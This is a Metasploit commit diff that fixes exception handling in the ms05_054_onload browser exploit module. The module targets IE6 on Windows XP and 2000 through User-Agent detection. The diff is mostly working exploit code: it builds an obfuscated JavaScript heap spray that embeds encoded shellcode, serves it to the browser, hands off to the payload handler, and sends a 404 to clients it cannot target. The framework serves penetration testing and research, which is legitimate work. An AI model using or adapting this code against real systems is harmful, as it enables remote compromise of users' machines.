Fixed exceptions in ms05_054_onload exploit module.

2012-11-09 12:18:04 +11:00 · 2012-11-09 12:18:04 +11:00 · 56bb907f9f
parent 1c3aa97bf8
commit 56bb907f9f
1 changed files with 12 additions and 10 deletions
--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@ -83,7 +83,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
 			mytarget = targets[1]	# IE6 on 2000
 		else
-			print_error("Unknown User-Agent #{agent}")
+			print_error("Unknown User-Agent #{agent}, sending 404.")
+			cli.send_response(create_response(404, 'File not found'))
 		end

 		mytarget
@ -91,11 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote


 	def on_request_uri(cli, request)
-		mytarget   = auto_target(cli, request)
-		var_title  = rand_text_alpha(rand(100) + 1)
-		func_main  = rand_text_alpha(rand(100) + 1)
+		if (mytarget = auto_target(cli, request))
+			var_title  = rand_text_alpha(rand(100) + 1)
+			func_main  = rand_text_alpha(rand(100) + 1)

-		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
+			heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {
 	shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
@ -183,11 +184,12 @@ function #{func_main}()
 </html>
 |

-		print_status("Sending #{self.name}")
-		# Transmit the compressed response to the client
-		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
+			print_status("Sending #{self.name}")
+			# Transmit the compressed response to the client
+			send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

-		# Handle the payload
-		handler(cli)
+			# Handle the payload
+			handler(cli)
+		end
 	end
 end